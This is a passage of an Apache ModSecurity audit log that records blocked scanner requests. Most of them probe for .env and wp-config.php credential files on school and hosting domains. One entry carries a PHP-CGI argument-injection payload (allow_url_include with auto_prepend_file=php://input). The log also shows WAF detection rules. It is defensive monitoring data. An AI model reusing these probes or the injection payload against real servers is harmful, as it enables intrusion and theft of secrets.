"CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948732105646 889 (- - -) Stopwatch2: 1746948732105646 889; combined=367, p1=309, p2=0, p3=0, p4=0, p5=58, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8dc03178-Z-- --d9870773-A-- [11/May/2025:14:32:18 +0700] aCBSggpy530QiWmSS61dKwAAAEU 103.236.140.4 54584 103.236.140.4 8181 --d9870773-B-- GET /docker/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.179 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.179 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: */* --d9870773-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d9870773-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948738643931 775 (- - -) Stopwatch2: 1746948738643931 775; combined=305, p1=267, p2=0, p3=0, p4=0, p5=38, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d9870773-Z-- --751ded13-A-- [11/May/2025:14:32:29 +0700] aCBSjUEuxCpmyy5aJPm7mQAAAAY 103.236.140.4 54588 103.236.140.4 8181 --751ded13-B-- GET /__tests__/test-become/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.183 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.183 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept: */* --751ded13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --751ded13-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948749371671 889 (- - -) Stopwatch2: 1746948749371671 889; combined=350, p1=307, p2=0, p3=0, p4=0, p5=43, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --751ded13-Z-- --c32ef254-A-- [11/May/2025:14:40:40 +0700] aCBUeEEuxCpmyy5aJPm7nQAAAAc 103.236.140.4 54628 103.236.140.4 8181 --c32ef254-B-- GET /.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 194.50.16.252 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 194.50.16.252 Accept-Encoding: gzip X-Varnish: 146676016 --c32ef254-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c32ef254-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746949240618459 838 (- - -) Stopwatch2: 1746949240618459 838; combined=326, p1=287, p2=0, p3=0, p4=0, p5=39, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c32ef254-Z-- --89ef023b-A-- [11/May/2025:14:40:45 +0700] aCBUfU8xOExV7lPH_Dl_6gAAANc 103.236.140.4 54632 103.236.140.4 8181 --89ef023b-B-- GET /api/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 194.50.16.252 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6.1 Safari/605.1.15 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 194.50.16.252 Accept-Encoding: gzip X-Varnish: 146676019 --89ef023b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --89ef023b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746949245474882 827 (- - -) Stopwatch2: 1746949245474882 827; combined=314, p1=275, p2=0, p3=0, p4=0, p5=38, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --89ef023b-Z-- --8ab43e1d-A-- [11/May/2025:14:40:49 +0700] aCBUgQpy530QiWmSS61dNAAAAEE 103.236.140.4 54636 103.236.140.4 8181 --8ab43e1d-B-- GET /config/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 194.50.16.252 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 194.50.16.252 Accept-Encoding: gzip X-Varnish: 146676022 --8ab43e1d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --8ab43e1d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746949249575460 698 (- - -) Stopwatch2: 1746949249575460 698; combined=261, p1=232, p2=0, p3=0, p4=0, p5=29, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8ab43e1d-Z-- --e69c8242-A-- [11/May/2025:14:40:58 +0700] aCBUigpy530QiWmSS61dNQAAAEk 103.236.140.4 54640 103.236.140.4 8181 --e69c8242-B-- GET /admin/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 194.50.16.252 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 194.50.16.252 Accept-Encoding: gzip X-Varnish: 146676025 --e69c8242-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e69c8242-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746949258773152 796 (- - -) Stopwatch2: 1746949258773152 796; combined=322, p1=291, p2=0, p3=0, p4=0, p5=31, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e69c8242-Z-- --1b9d1c05-A-- [11/May/2025:14:41:07 +0700] aCBUk0EuxCpmyy5aJPm7nwAAABg 103.236.140.4 54644 103.236.140.4 8181 --1b9d1c05-B-- GET /perpustakaan/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 194.50.16.252 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 194.50.16.252 Accept-Encoding: gzip X-Varnish: 146676028 --1b9d1c05-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1b9d1c05-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746949267499349 820 (- - -) Stopwatch2: 1746949267499349 820; combined=330, p1=291, p2=0, p3=0, p4=0, p5=39, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1b9d1c05-Z-- --e0983b54-A-- [11/May/2025:14:41:15 +0700] aCBUm08xOExV7lPH_Dl_6wAAAMY 103.236.140.4 54650 103.236.140.4 8181 --e0983b54-B-- GET /smkn22jakarta/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 194.50.16.252 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 194.50.16.252 Accept-Encoding: gzip X-Varnish: 146548948 --e0983b54-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e0983b54-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746949275061994 777 (- - -) Stopwatch2: 1746949275061994 777; combined=313, p1=278, p2=0, p3=0, p4=0, p5=35, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e0983b54-Z-- --7443873a-A-- [11/May/2025:14:58:14 +0700] aCBYlgpy530QiWmSS61eCAAAAFI 103.236.140.4 57892 103.236.140.4 8181 --7443873a-B-- GET /.env.save HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.211.191.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.211.191.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 Accept-Charset: utf-8 --7443873a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7443873a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746950294763744 883 (- - -) Stopwatch2: 1746950294763744 883; combined=346, p1=309, p2=0, p3=0, p4=0, p5=37, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7443873a-Z-- --3a2d3c31-A-- [11/May/2025:15:10:11 +0700] aCBbYwpy530QiWmSS61eCgAAAFE 103.236.140.4 57928 103.236.140.4 8181 --3a2d3c31-B-- GET /.env.save HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.87 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Accept-Charset: utf-8 --3a2d3c31-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3a2d3c31-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746951011119864 868 (- - -) Stopwatch2: 1746951011119864 868; combined=341, p1=299, p2=0, p3=0, p4=0, p5=42, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3a2d3c31-Z-- --d8ad5125-A-- [11/May/2025:15:39:55 +0700] aCBiW-bs1CLLACKj-_zQwQAAAJE 103.236.140.4 58072 103.236.140.4 8181 --d8ad5125-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 198.199.72.27 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 198.199.72.27 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --d8ad5125-C-- --d8ad5125-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d8ad5125-E-- --d8ad5125-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746952795957694 4834 (- - -) Stopwatch2: 1746952795957694 4834; combined=3042, p1=446, p2=2561, p3=0, p4=0, p5=35, sr=75, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d8ad5125-Z-- --8be95b05-A-- [11/May/2025:18:17:44 +0700] aCCHWObs1CLLACKj-_zR2wAAAJA 103.236.140.4 60982 103.236.140.4 8181 --8be95b05-B-- GET /.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 31.56.56.153 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 31.56.56.153 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --8be95b05-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8be95b05-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746962264390692 942 (- - -) Stopwatch2: 1746962264390692 942; combined=351, p1=305, p2=0, p3=0, p4=0, p5=46, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8be95b05-Z-- --be14a528-A-- [11/May/2025:18:49:58 +0700] aCCO5gpy530QiWmSS61tDgAAAEU 103.236.140.4 58816 103.236.140.4 8181 --be14a528-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 161.35.85.22 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 161.35.85.22 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --be14a528-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --be14a528-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746964198117914 766 (- - -) Stopwatch2: 1746964198117914 766; combined=303, p1=246, p2=0, p3=0, p4=0, p5=57, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --be14a528-Z-- --69e8fa5a-A-- [11/May/2025:19:34:59 +0700] aCCZc08xOExV7lPH_DmUCQAAAMs 103.236.140.4 41034 103.236.140.4 8181 --69e8fa5a-B-- GET /wp-config.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 160.202.33.87 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 160.202.33.87 X-Forwarded-Proto: http Connection: close User-Agent: python-requests/2.32.3 Accept: */* --69e8fa5a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --69e8fa5a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746966899205500 933 (- - -) Stopwatch2: 1746966899205500 933; combined=360, p1=320, p2=0, p3=0, p4=0, p5=40, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --69e8fa5a-Z-- --e1c9f900-A-- [11/May/2025:22:37:35 +0700] aCDEP-bs1CLLACKj-_zp1QAAAJM 103.236.140.4 47520 103.236.140.4 8181 --e1c9f900-B-- GET /.env_1 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.211.191.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.211.191.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3888.0 Safari/537.36 Accept-Charset: utf-8 --e1c9f900-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e1c9f900-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746977855888451 791 (- - -) Stopwatch2: 1746977855888451 791; combined=334, p1=295, p2=0, p3=0, p4=0, p5=38, sr=85, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e1c9f900-Z-- --3a5a6c69-A-- [11/May/2025:22:45:57 +0700] aCDGNQpy530QiWmSS615UQAAAEs 103.236.140.4 47554 103.236.140.4 8181 --3a5a6c69-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.144 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.144 X-Forwarded-Proto: https Connection: close User-Agent: Nokia3230/2.0 (5.0614.0) SymbianOS/7.0s Series60/2.1 Profile/MIDP-2.0 Configuration/CLDC-1.0 Accept-Charset: utf-8 --3a5a6c69-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3a5a6c69-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746978357669598 784 (- - -) Stopwatch2: 1746978357669598 784; combined=322, p1=280, p2=0, p3=0, p4=0, p5=42, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3a5a6c69-Z-- --81457206-A-- [11/May/2025:22:56:35 +0700] aCDIs-bs1CLLACKj-_zp2QAAAI8 103.236.140.4 47566 103.236.140.4 8181 --81457206-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 178.128.35.126 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 178.128.35.126 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --81457206-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --81457206-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746978995706368 799 (- - -) Stopwatch2: 1746978995706368 799; combined=309, p1=268, p2=0, p3=0, p4=0, p5=40, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --81457206-Z-- --55173120-A-- [11/May/2025:23:17:53 +0700] aCDNsebs1CLLACKj-_zp4wAAAJY 103.236.140.4 47686 103.236.140.4 8181 --55173120-B-- GET /.env_1 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.87 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; SM-G960F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.136 Mobile Safari/537.36 Accept-Charset: utf-8 --55173120-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --55173120-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746980273453119 929 (- - -) Stopwatch2: 1746980273453119 929; combined=430, p1=390, p2=0, p3=0, p4=0, p5=40, sr=133, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --55173120-Z-- --5d31ae7f-A-- [11/May/2025:23:24:34 +0700] aCDPQgpy530QiWmSS615bwAAAFc 103.236.140.4 47702 103.236.140.4 8181 --5d31ae7f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.175 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; SM-G960U1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --5d31ae7f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5d31ae7f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s 